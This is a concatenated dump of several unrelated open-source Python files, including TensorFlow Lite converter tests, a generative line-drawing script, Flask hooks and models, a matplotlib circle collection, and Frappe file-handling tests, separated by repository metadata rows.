from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class ConvertTest(test_util.TensorFlowTestCase):
def testBasic(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = in_tensor + in_tensor
sess = session.Session()
# Try running on valid graph
tflite_model = convert.toco_convert(sess.graph_def, [in_tensor],
[out_tensor])
self.assertTrue(tflite_model)
def testQuantization(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor + in_tensor, min=0., max=1.)
sess = session.Session()
tflite_model = convert.toco_convert(
sess.graph_def, [in_tensor], [out_tensor],
inference_type=lite_constants.QUANTIZED_UINT8,
quantized_input_stats=[(0., 1.)])
self.assertTrue(tflite_model)
def testQuantizationInvalid(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32)
out_tensor = array_ops.fake_quant_with_min_max_args(
in_tensor + in_tensor, min=0., max=1.)
sess = session.Session()
with self.assertRaises(ValueError) as error:
convert.toco_convert(
sess.graph_def, [in_tensor], [out_tensor],
inference_type=lite_constants.QUANTIZED_UINT8)
self.assertEqual(
"std_dev and mean must be defined when inference_type or "
"inference_input_type is QUANTIZED_UINT8 or INT8.",
str(error.exception))
with self.assertRaises(ValueError) as error:
convert.toco_convert(
sess.graph_def, [in_tensor], [out_tensor],
inference_type=lite_constants.QUANTIZED_UINT8,
inference_input_type=lite_constants.FLOAT)
self.assertEqual(
"std_dev and mean must be defined when inference_type or "
"inference_input_type is QUANTIZED_UINT8 or INT8.",
str(error.exception))
def testGraphDefBasic(self):
with ops.Graph().as_default():
in_tensor = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="input")
_ = in_tensor + in_tensor
sess = session.Session()
tflite_model = convert.toco_convert_graph_def(
sess.graph_def, [("input", [1, 16, 16, 3])], ["add"],
enable_mlir_converter=False,
inference_type=lite_constants.FLOAT)
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual("input", input_details[0]["name"])
self.assertEqual(np.float32, input_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == input_details[0]["shape"]).all())
self.assertEqual((0., 0.), input_details[0]["quantization"])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual("add", output_details[0]["name"])
self.assertEqual(np.float32, output_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == output_details[0]["shape"]).all())
self.assertEqual((0., 0.), output_details[0]["quantization"])
def testGraphDefQuantization(self):
with ops.Graph().as_default():
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputA")
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputB")
_ = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name="output")
sess = session.Session()
input_arrays_map = [("inputA", [1, 16, 16, 3]), ("inputB", [1, 16, 16, 3])]
output_arrays = ["output"]
tflite_model = convert.toco_convert_graph_def(
sess.graph_def,
input_arrays_map,
output_arrays,
enable_mlir_converter=False,
inference_type=lite_constants.QUANTIZED_UINT8,
quantized_input_stats=[(0., 1.), (0., 1.)])
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual("inputA", input_details[0]["name"])
self.assertEqual(np.uint8, input_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == input_details[0]["shape"]).all())
self.assertEqual((1., 0.),
input_details[0]["quantization"]) # scale, zero_point
self.assertEqual("inputB", input_details[1]["name"])
self.assertEqual(np.uint8, input_details[1]["dtype"])
self.assertTrue(([1, 16, 16, 3] == input_details[1]["shape"]).all())
self.assertEqual((1., 0.),
input_details[1]["quantization"]) # scale, zero_point
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual("output", output_details[0]["name"])
self.assertEqual(np.uint8, output_details[0]["dtype"])
self.assertTrue(([1, 16, 16, 3] == output_details[0]["shape"]).all())
self.assertTrue(output_details[0]["quantization"][0] > 0) # scale
def testGraphDefQuantizationInvalid(self):
with ops.Graph().as_default():
in_tensor_1 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputA")
in_tensor_2 = array_ops.placeholder(
shape=[1, 16, 16, 3], dtype=dtypes.float32, name="inputB")
_ = array_ops.fake_quant_with_min_max_args(
in_tensor_1 + in_tensor_2, min=0., max=1., name="output")
sess = session.Session()
input_arrays_map = [("inputA", [1, 16, 16, 3]), ("inputB", [1, 16, 16, 3])]
output_arrays = ["output"]
with self.assertRaises(ValueError) as error:
convert.toco_convert_graph_def(
sess.graph_def,
input_arrays_map,
output_arrays,
enable_mlir_converter=False,
inference_type=lite_constants.QUANTIZED_UINT8)
self.assertEqual(
"std_dev and mean must be defined when inference_type or "
"inference_input_type is QUANTIZED_UINT8 or INT8.",
str(error.exception))
class ConvertTestOpHint(test_util.TensorFlowTestCase):
"""Test the hint to stub functionality."""
def _getGraphOpTypes(self, graphdef, output_nodes):
"""Returns used op types in `graphdef` reachable from `output_nodes`.
This is used to check that after the stub transformation the expected
nodes are there.
NOTE: this is not a exact test that the graph is the correct output, but
it balances compact expressibility of test with sanity checking.
Args:
graphdef: TensorFlow proto graphdef.
output_nodes: A list of output node names that we need to reach.
Returns:
A set of node types reachable from `output_nodes`.
"""
name_to_input_name, name_to_node, _ = (
_extract_graph_summary(graphdef))
# Find all nodes that are needed by the outputs
used_node_names = _bfs_for_reachable_nodes(output_nodes, name_to_input_name)
return set([name_to_node[node_name].op for node_name in used_node_names])
def _countIdentities(self, nodes):
"""Count the number of "Identity" op types in the list of proto nodes.
Args:
nodes: NodeDefs of the graph.
Returns:
The number of nodes with op type "Identity" found.
"""
return len([x for x in nodes if x.op == "Identity"])
def testSwishLiteHint(self):
"""Makes a custom op swish and makes sure it gets converted as a unit."""
with ops.Graph().as_default():
image = array_ops.constant([1., 2., 3., 4.])
swish_scale = array_ops.constant(1.0)
def _swish(input_tensor, scale):
custom = op_hint.OpHint("cool_activation")
input_tensor, scale = custom.add_inputs(input_tensor, scale)
output = math_ops.sigmoid(input_tensor) * input_tensor * scale
output, = custom.add_outputs(output)
return output
output = array_ops.identity(
_swish(image, swish_scale), name="ModelOutput")
with self.cached_session() as sess:
# check if identities have been put into the graph (2 input, 1 output,
# and 1 final output).
self.assertEqual(self._countIdentities(sess.graph_def.node), 4)
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["cool_activation", "Const", "Identity"]))
def testScaleAndBiasAndIdentity(self):
"""This tests a scaled add which has 3 inputs and 2 outputs."""
with ops.Graph().as_default():
a = array_ops.constant(1.)
x = array_ops.constant([2., 3.])
b = array_ops.constant([4., 5.])
def _scaled_and_bias_and_identity(a, x, b):
custom = op_hint.OpHint("scale_and_bias_and_identity")
a, x, b = custom.add_inputs(a, x, b)
return custom.add_outputs(a * x + b, x)
output = array_ops.identity(
_scaled_and_bias_and_identity(a, x, b), name="ModelOutput")
with self.cached_session() as sess:
# make sure one identity for each input (3) and output (2) => 3 + 2 = 5
# +1 for the final output
self.assertEqual(self._countIdentities(sess.graph_def.node), 6)
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["scale_and_bias_and_identity", "Const", "Identity", "Pack"]))
def testTwoFunctions(self):
"""Tests if two functions are converted correctly."""
with ops.Graph().as_default():
a = array_ops.constant([1.])
b = array_ops.constant([1.])
def _double_values(x):
custom = op_hint.OpHint("add_test")
x, = custom.add_inputs(x)
output = math_ops.multiply(x, x)
output, = custom.add_outputs(output)
return output
output = array_ops.identity(
math_ops.add(_double_values(a), _double_values(b)),
name="ModelOutput")
with self.cached_session() as sess:
# make sure one identity for each input (2) and output (2) => 2 + 2
# +1 for the final output
self.assertEqual(self._countIdentities(sess.graph_def.node), 5)
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["add_test", "Const", "Identity", "Add"]))
def _get_input_index(self, x):
return x.op.node_def.attr[op_hint.OpHint.FUNCTION_INPUT_INDEX_ATTR].i
def _get_output_index(self, x):
return x.op.node_def.attr[op_hint.OpHint.FUNCTION_OUTPUT_INDEX_ATTR].i
def _get_sort_index(self, x):
return x.op.node_def.attr[op_hint.OpHint.FUNCTION_SORT_INDEX_ATTR].i
def testTags(self):
"""Test if multiple args with the same tag are grouped."""
with ops.Graph().as_default():
a = array_ops.constant([1.])
b = array_ops.constant([2.])
c = array_ops.constant([3.])
d = array_ops.constant([4.])
custom = op_hint.OpHint("test_tag")
a = custom.add_input(
a, tag="mytag", aggregate=op_hint.OpHint.AGGREGATE_STACK)
b, = custom.add_inputs(b)
c = custom.add_input(
c, tag="mytag", aggregate=op_hint.OpHint.AGGREGATE_STACK)
d = custom.add_input(
d, tag="mytag2", aggregate=op_hint.OpHint.AGGREGATE_STACK)
res = math_ops.add(math_ops.mul(a, b), math_ops.mul(c, b))
custom.add_outputs([res])
with self.cached_session():
self.assertEqual(self._get_input_index(a), 0)
self.assertEqual(self._get_sort_index(a), 0)
self.assertEqual(self._get_input_index(b), 1)
self.assertEqual(self._get_sort_index(b), 0)
self.assertEqual(self._get_input_index(c), 0)
self.assertEqual(self._get_sort_index(c), 1)
def testOverrideIndex(self):
with ops.Graph().as_default():
a = array_ops.constant([1.])
b = array_ops.constant([2.])
c = array_ops.constant([3.])
custom = op_hint.OpHint("test_override")
b = custom.add_input(b) # should auto assign 0
a = custom.add_input(a, index_override=1)
c = custom.add_input(c) # should auto assign 2
with self.cached_session():
self.assertEqual(self._get_input_index(a), 1)
self.assertEqual(self._get_input_index(b), 0)
self.assertEqual(self._get_input_index(c), 2)
def testAggregate(self):
with ops.Graph().as_default():
a = array_ops.constant([3., 4.])
b = array_ops.constant([5., 6.])
hint = op_hint.OpHint("agg")
a0, a1 = array_ops.unstack(a)
b0, b1 = array_ops.unstack(b)
a0 = hint.add_input(a0, tag="c", aggregate=op_hint.OpHint.AGGREGATE_STACK)
b0 = hint.add_input(b0, tag="n", aggregate=op_hint.OpHint.AGGREGATE_STACK)
a1 = hint.add_input(a1, tag="c", aggregate=op_hint.OpHint.AGGREGATE_STACK)
b1 = hint.add_input(b1, tag="n", aggregate=op_hint.OpHint.AGGREGATE_STACK)
c0 = math_ops.add(a0, b0, name="addleft")
c1 = math_ops.add(a1, b1, name="addright")
c0 = hint.add_output(
c0, tag="out", aggregate=op_hint.OpHint.AGGREGATE_STACK)
c1 = hint.add_output(
c1, tag="out", aggregate=op_hint.OpHint.AGGREGATE_STACK)
curr = array_ops.stack([c0, c1])
output = array_ops.identity(curr, name="FINAL_OUTPUT")
with self.cached_session() as sess:
stubbed_graphdef = op_hint.convert_op_hints_to_stubs(
graph_def=sess.graph_def)
self.assertEqual(
self._getGraphOpTypes(
stubbed_graphdef,
output_nodes=[op_hint._tensor_name_base(output.name)]),
set(["agg", "Const", "Identity"]))
def testFindHintedOutputNodes(self):
"""Test if all hinted output nodes are correctly found."""
with ops.Graph().as_default():
def _build_ophinted_op(name, input1, input2):
custom_op = op_hint.OpHint(name)
input1 = custom_op.add_input(input1)
input2 = custom_op.add_input(input2)
output = math_ops.mul(input1, input2)
return custom_op.add_output(output)
output_1 = _build_ophinted_op("custom_op_1", array_ops.constant([1.]),
array_ops.constant([2.]))
output_2 = _build_ophinted_op("custom_op_2", array_ops.constant([3.]),
array_ops.constant([4.]))
with self.cached_session() as sess:
hinted_outputs_nodes = op_hint.find_all_hinted_output_nodes(sess)
expected_hinted_output_nodes = [
_node_name(output_1.name),
_node_name(output_2.name)
]
self.assertEqual(
len(hinted_outputs_nodes), len(expected_hinted_output_nodes))
if __name__ == "__main__":
test.main()
| apache-2.0 | -2,934,640,926,344,554,500 | 39.382075 | 80 | 0.632753 | false |
inconvergent/differential-line | main_line_ani.py | 1 | 2648 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
from numpy import pi
# from numpy import cos
# from numpy import sin
from numpy.random import random
from numpy import zeros
# from numpy import linspace
from numpy import floor
from modules.growth import spawn_curl
NMAX = 10**6
SIZE = 512
ONE = 1./SIZE
PROCS = 2
INIT_NUM = 10
STP = ONE*0.1
NEARL = 4*ONE
FARL = 100*ONE
MID = 0.5
LINEWIDTH = 5.*ONE
BACK = [1,1,1,1]
FRONT = [0,0,0,0.05]
TWOPI = pi*2.
grains = 10
np_coords = zeros(shape=(NMAX,4), dtype='float')
np_vert_coords = zeros(shape=(NMAX,2), dtype='float')
def steps(df):
from time import time
from modules.helpers import print_stats
t1 = time()
df.optimize_position(STP)
spawn_curl(df, NEARL)
if df.safe_vertex_positions(3*STP)<0:
print('vertices reached the boundary. stopping.')
return False
t2 = time()
print_stats(0, t2-t1, df)
return True
def main():
from iutils.render import Animate
from differentialLine import DifferentialLine
from fn import Fn
from modules.show import sandstroke
from modules.show import dots
DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)
## arc
# angles = sorted(random(INIT_NUM)*pi*1.5)
# xys = []
# for a in angles:
# x = 0.5 + cos(a)*0.06
# y = 0.5 + sin(a)*0.06
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
## vertical line
#xx = sorted(0.45+0.1*random(INIT_NUM))
#yy = MID+0.005*(0.5-random(INIT_NUM))
#xys = []
#for x,y in zip(xx,yy):
#xys.append((x,y))
#DF.init_line_segment(xys, lock_edges=1)
# diagonal line
# yy = sorted(0.3+0.4*random(INIT_NUM))
# xx = 0.3+linspace(0,0.4,num=INIT_NUM)
# xys = []
# for x,y in zip(xx,yy):
# xys.append((x,y))
# DF.init_line_segment(xys, lock_edges=1)
angles = sorted(random(INIT_NUM)*TWOPI)
DF.init_circle_segment(MID,MID,FARL*0.2, angles)
fn = Fn(prefix='./res/', postfix='.png')
def wrap(render):
global np_coords
global np_vert_coords
global grains
## if fn is a path each image will be saved to that path
if not render.steps%3:
f = fn.name()
else:
f = None
grains += (-1)**floor(2*random())
print(grains)
if grains<0:
grains = 0
res = steps(DF)
render.set_front(FRONT)
coord_num = DF.np_get_edges_coordinates(np_coords)
sandstroke(render,np_coords[:coord_num,:],grains,f)
if not random()<0.1:
vert_num = DF.np_get_vert_coordinates(np_vert_coords)
dots(render,np_vert_coords[:vert_num,:],None)
return res
render = Animate(SIZE, BACK, FRONT, wrap)
render.start()
if __name__ == '__main__':
main()
| mit | 5,529,219,206,050,234,000 | 17.262069 | 60 | 0.628021 | false |
pastgift/seed-website-py | app/index/hooks.py | 1 | 1472 | # -*- coding: utf-8 -*-
from flask import render_template, request, jsonify, flash, g
from flask.ext.login import current_user
from . import index_blueprint
from .. import db
from .. import babel
from ..models import User
from datetime import datetime
@index_blueprint.before_app_request
def before_request():
if not request.user_agent.browser:
return
user_browser = request.user_agent.browser.lower()
if user_browser != 'chrome':
# Do some thing
pass
@index_blueprint.after_app_request
def after_request(res):
# Record latest access
if current_user.is_authenticated:
current_user.ping()
return res
@babel.localeselector
def get_locale():
'''
Select Language Tag
'''
lang = request.cookies.get('lang', 'en')
# Uncomment to auto match language
# if not lang:
# lang = request.accept_languages.best_match(['zh_CN', 'zh_TW', 'ja'])
babel_lang_alias = {
'zh_CN': 'zh_Hans_CN',
'zh_TW': 'zh_Hant_TW',
'ja' : 'ja_JP',
# Add more languages
#'<Setting Name>': 'Babel Locale Name'
}
datepicker_lang_alias = {
'zh_CN': 'zh-CN',
'zh_TW': 'zh-TW',
# Add more languages
#'<Setting Name>': 'jQuery-datapicker Locale Name'
}
g.lang = lang
g.babel_lang = babel_lang_alias.get(lang, lang)
g.datepicker_lang = datepicker_lang_alias.get(lang, lang)
return g.babel_lang | mit | 1,368,370,693,941,926,000 | 23.147541 | 78 | 0.608696 | false |
dean0x7d/pybinding | pybinding/support/collections.py | 1 | 3143 | import numpy as np
from matplotlib.collections import Collection
from matplotlib.artist import allow_rasterization
# noinspection PyAbstractClass
class CircleCollection(Collection):
"""Custom circle collection
The default matplotlib `CircleCollection` creates circles based on their
area in screen units. This class uses the radius in data units. It behaves
like a much faster version of a `PatchCollection` of `Circle`.
The implementation is similar to `EllipseCollection`.
"""
def __init__(self, radius, **kwargs):
super().__init__(**kwargs)
from matplotlib import path, transforms
self.radius = np.atleast_1d(radius)
self._paths = [path.Path.unit_circle()]
self.set_transform(transforms.IdentityTransform())
self._transforms = np.empty((0, 3, 3))
def _set_transforms(self):
ax = self.axes
self._transforms = np.zeros((self.radius.size, 3, 3))
self._transforms[:, 0, 0] = self.radius * ax.bbox.width / ax.viewLim.width
self._transforms[:, 1, 1] = self.radius * ax.bbox.height / ax.viewLim.height
self._transforms[:, 2, 2] = 1
@allow_rasterization
def draw(self, renderer):
self._set_transforms()
super().draw(renderer)
class Circle3DCollection(CircleCollection):
def __init__(self, radius, zs=0, zdir='z', depthshade=True, **kwargs):
super().__init__(radius, **kwargs)
self._depthshade = depthshade
self.set_3d_properties(zs, zdir)
self._A0 = self._A
def set_array(self, array):
self._A0 = array
super().set_array(array)
def set_3d_properties(self, zs, zdir):
# Force the collection to initialize the face and edgecolors
# just in case it is a scalarmappable with a colormap.
self.update_scalarmappable()
offsets = self.get_offsets()
if len(offsets) > 0:
xs, ys = list(zip(*offsets))
else:
xs = []
ys = []
from mpl_toolkits.mplot3d.art3d import juggle_axes
self._offsets3d = juggle_axes(xs, ys, np.atleast_1d(zs), zdir)
self._facecolor3d = self.get_facecolor()
self._edgecolor3d = self.get_edgecolor()
def do_3d_projection(self, renderer):
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d.art3d import zalpha
from matplotlib import colors as mcolors
# transform and sort in z direction
v = np.array(proj3d.proj_transform_clip(*self._offsets3d, M=renderer.M)[:3])
idx = v[2].argsort()[::-1]
vzs = v[2, idx]
self.set_offsets(v[:2, idx].transpose())
super().set_array(self._A0[idx])
fcs = zalpha(self._facecolor3d, vzs) if self._depthshade else self._facecolor3d
fcs = mcolors.colorConverter.to_rgba_array(fcs, self._alpha)
self.set_facecolors(fcs)
ecs = zalpha(self._edgecolor3d, vzs) if self._depthshade else self._edgecolor3d
ecs = mcolors.colorConverter.to_rgba_array(ecs, self._alpha)
self.set_edgecolors(ecs)
return min(vzs) if vzs.size > 0 else np.nan
| bsd-2-clause | 452,870,017,756,134,800 | 36.416667 | 87 | 0.634108 | false |
KenleyArai/ComicbookTime | app/models.py | 1 | 4953 | from app import db
from flask.ext.security import RoleMixin
from datetime import datetime
# Defining the table for the many-many relationship of User and Comic
bought_comics = db.Table('bought',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
follows_series = db.Table('follows',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('series_id', db.Integer, db.ForeignKey('series.id')),
)
created = db.Table('created_comic',
db.Column('creator_id', db.Integer, db.ForeignKey('creator.id')),
db.Column('comic_id', db.Integer, db.ForeignKey('comic.id')),
)
# Define models
roles_users = db.Table('roles_users',
db.Column('user_id', db.Integer(), db.ForeignKey('user.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id')))
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(80), unique=True)
description = db.Column(db.String(255))
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
google_id = db.Column(db.String, unique=True)
# many to many: A user can have many comics
bought_comics = db.relationship('Comic',
secondary=bought_comics,
backref=db.backref('users', lazy='dynamic'),
order_by='Comic.series_id')
follows_series = db.relationship('Series',
secondary=follows_series,
backref=db.backref('users', lazy='dynamic'))
roles = db.relationship('Role',
secondary=roles_users,
backref=db.backref('users', lazy='dynamic'))
connections = db.relationship('Connection',
backref=db.backref('user', lazy='joined'),
cascade="all", uselist=False)
active = False
def is_active(self):
return True
def get_id(self):
return self.id
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def __init__(self, google_id, active, roles):
self.google_id = google_id
self.active = active
self.roles = roles
def __repr__(self):
return "<Google ID {}>".format(self.google_id)
class Connection(db.Model):
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
provider_id = db.Column(db.String(255))
full_name = db.Column(db.String(255))
provider_user_id = db.Column(db.String(255))
access_token = db.Column(db.String(255))
secret = db.Column(db.String(255))
display_name = db.Column(db.String(255))
profile_url = db.Column(db.String(512))
image_url = db.Column(db.String(512))
rank = db.Column(db.Integer)
class Series(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
comics = db.relationship('Comic', backref='Series',lazy='dynamic')
def __init__(self,title,comics):
self.title = title
self.comics = comics
def __repr__(self):
return "{}".format(self.title)
class Comic(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String, unique=True)
source_url = db.Column(db.String)
image_link = db.Column(db.String)
release_date = db.Column(db.DateTime)
series_id = db.Column(db.Integer, db.ForeignKey('series.id'))
def __init__(self, title, source_url, image_link, release_date):
self.title = title
self.source_url = source_url
self.image_link = image_link
self.release_date = release_date
def is_avail(self):
return self.release_date < datetime.now()
def get_dict(self):
return {'id': self.id,
'title': self.title,
'source_url': self.source_url,
'image_link': self.image_link,
'release_date': datetime.date(self.release_date).isoformat(),
'series_id': self.series_id,
'avail': self.is_avail()}
def __repr__(self):
data = self.get_dict()
return "<Title:{title}><Source Url:{source_url}><Image Link:{image_link}><Release Date:{release_date}>".format(**data)
class Creator(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String, unique=True)
created_comics = db.relationship('Comic',
secondary=created,
backref=db.backref('creator', lazy='dynamic'))
| mit | -8,246,468,935,077,410,000 | 35.153285 | 126 | 0.566727 | false |
kaji-project/adagios | adagios/myapp/urls.py | 1 | 1069 | # Adagios is a web based Nagios configuration interface
#
# Copyright (C) 2014, Pall Sigurdsson <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url, patterns
urlpatterns = patterns('adagios',
(r'^/?$', 'myapp.views.hello_world'),
(r'^/url1?$', 'myapp.views.hello_world'),
(r'^/url2?$', 'myapp.views.hello_world'),
)
| agpl-3.0 | 3,705,995,088,820,243,000 | 43.541667 | 74 | 0.680075 | false |
adityahase/frappe | frappe/core/doctype/file/test_file.py | 1 | 10524 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import base64
import frappe
import os
import unittest
from frappe import _
from frappe.core.doctype.file.file import move_file
from frappe.utils import get_files_path
# test_records = frappe.get_test_records('File')
test_content1 = 'Hello'
test_content2 = 'Hello World'
def make_test_doc():
d = frappe.new_doc('ToDo')
d.description = 'Test'
d.save()
return d.doctype, d.name
class TestSimpleFile(unittest.TestCase):
def setUp(self):
self.attached_to_doctype, self.attached_to_docname = make_test_doc()
self.test_content = test_content1
_file = frappe.get_doc({
"doctype": "File",
"file_name": "test1.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_name": self.attached_to_docname,
"content": self.test_content})
_file.save()
self.saved_file_url = _file.file_url
def test_save(self):
_file = frappe.get_doc("File", {"file_url": self.saved_file_url})
content = _file.get_content()
self.assertEqual(content, self.test_content)
def tearDown(self):
# File gets deleted on rollback, so blank
pass
class TestBase64File(unittest.TestCase):
def setUp(self):
self.attached_to_doctype, self.attached_to_docname = make_test_doc()
self.test_content = base64.b64encode(test_content1.encode('utf-8'))
_file = frappe.get_doc({
"doctype": "File",
"file_name": "test_base64.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_docname": self.attached_to_docname,
"content": self.test_content,
"decode": True})
_file.save()
self.saved_file_url = _file.file_url
def test_saved_content(self):
_file = frappe.get_doc("File", {"file_url": self.saved_file_url})
content = _file.get_content()
self.assertEqual(content, test_content1)
def tearDown(self):
# File gets deleted on rollback, so blank
pass
class TestSameFileName(unittest.TestCase):
def test_saved_content(self):
self.attached_to_doctype, self.attached_to_docname = make_test_doc()
self.test_content1 = test_content1
self.test_content2 = test_content2
_file1 = frappe.get_doc({
"doctype": "File",
"file_name": "testing.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_name": self.attached_to_docname,
"content": self.test_content1})
_file1.save()
_file2 = frappe.get_doc({
"doctype": "File",
"file_name": "testing.txt",
"attached_to_doctype": self.attached_to_doctype,
"attached_to_name": self.attached_to_docname,
"content": self.test_content2})
_file2.save()
self.saved_file_url1 = _file1.file_url
self.saved_file_url2 = _file2.file_url
_file = frappe.get_doc("File", {"file_url": self.saved_file_url1})
content1 = _file.get_content()
self.assertEqual(content1, self.test_content1)
_file = frappe.get_doc("File", {"file_url": self.saved_file_url2})
content2 = _file.get_content()
self.assertEqual(content2, self.test_content2)
def test_saved_content_private(self):
_file1 = frappe.get_doc({
"doctype": "File",
"file_name": "testing-private.txt",
"content": test_content1,
"is_private": 1
}).insert()
_file2 = frappe.get_doc({
"doctype": "File",
"file_name": "testing-private.txt",
"content": test_content2,
"is_private": 1
}).insert()
_file = frappe.get_doc("File", {"file_url": _file1.file_url})
self.assertEqual(_file.get_content(), test_content1)
_file = frappe.get_doc("File", {"file_url": _file2.file_url})
self.assertEqual(_file.get_content(), test_content2)
class TestSameContent(unittest.TestCase):
def setUp(self):
self.attached_to_doctype1, self.attached_to_docname1 = make_test_doc()
self.attached_to_doctype2, self.attached_to_docname2 = make_test_doc()
self.test_content1 = test_content1
self.test_content2 = test_content1
self.orig_filename = 'hello.txt'
self.dup_filename = 'hello2.txt'
_file1 = frappe.get_doc({
"doctype": "File",
"file_name": self.orig_filename,
"attached_to_doctype": self.attached_to_doctype1,
"attached_to_name": self.attached_to_docname1,
"content": self.test_content1})
_file1.save()
_file2 = frappe.get_doc({
"doctype": "File",
"file_name": self.dup_filename,
"attached_to_doctype": self.attached_to_doctype2,
"attached_to_name": self.attached_to_docname2,
"content": self.test_content2})
_file2.save()
def test_saved_content(self):
self.assertFalse(os.path.exists(get_files_path(self.dup_filename)))
def tearDown(self):
# File gets deleted on rollback, so blank
pass
class TestFile(unittest.TestCase):
def setUp(self):
self.delete_test_data()
self.upload_file()
def tearDown(self):
try:
frappe.get_doc("File", {"file_name": "file_copy.txt"}).delete()
except frappe.DoesNotExistError:
pass
def delete_test_data(self):
for f in frappe.db.sql('''select name, file_name from tabFile where
is_home_folder = 0 and is_attachments_folder = 0 order by creation desc'''):
frappe.delete_doc("File", f[0])
def upload_file(self):
_file = frappe.get_doc({
"doctype": "File",
"file_name": "file_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": self.get_folder("Test Folder 1", "Home").name,
"content": "Testing file copy example."})
_file.save()
self.saved_folder = _file.folder
self.saved_name = _file.name
self.saved_filename = get_files_path(_file.file_name)
def get_folder(self, folder_name, parent_folder="Home"):
return frappe.get_doc({
"doctype": "File",
"file_name": _(folder_name),
"is_folder": 1,
"folder": _(parent_folder)
}).insert()
def tests_after_upload(self):
self.assertEqual(self.saved_folder, _("Home/Test Folder 1"))
file_folder = frappe.db.get_value("File", self.saved_name, "folder")
self.assertEqual(file_folder, _("Home/Test Folder 1"))
def test_file_copy(self):
folder = self.get_folder("Test Folder 2", "Home")
file = frappe.get_doc("File", {"file_name": "file_copy.txt"})
move_file([{"name": file.name}], folder.name, file.folder)
file = frappe.get_doc("File", {"file_name": "file_copy.txt"})
self.assertEqual(_("Home/Test Folder 2"), file.folder)
def test_folder_depth(self):
result1 = self.get_folder("d1", "Home")
self.assertEqual(result1.name, "Home/d1")
result2 = self.get_folder("d2", "Home/d1")
self.assertEqual(result2.name, "Home/d1/d2")
result3 = self.get_folder("d3", "Home/d1/d2")
self.assertEqual(result3.name, "Home/d1/d2/d3")
result4 = self.get_folder("d4", "Home/d1/d2/d3")
_file = frappe.get_doc({
"doctype": "File",
"file_name": "folder_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": result4.name,
"content": "Testing folder copy example"})
_file.save()
def test_folder_copy(self):
folder = self.get_folder("Test Folder 2", "Home")
folder = self.get_folder("Test Folder 3", "Home/Test Folder 2")
_file = frappe.get_doc({
"doctype": "File",
"file_name": "folder_copy.txt",
"attached_to_name": "",
"attached_to_doctype": "",
"folder": folder.name,
"content": "Testing folder copy example"})
_file.save()
move_file([{"name": folder.name}], 'Home/Test Folder 1', folder.folder)
file = frappe.get_doc("File", {"file_name":"folder_copy.txt"})
file_copy_txt = frappe.get_value("File", {"file_name":"file_copy.txt"})
if file_copy_txt:
frappe.get_doc("File", file_copy_txt).delete()
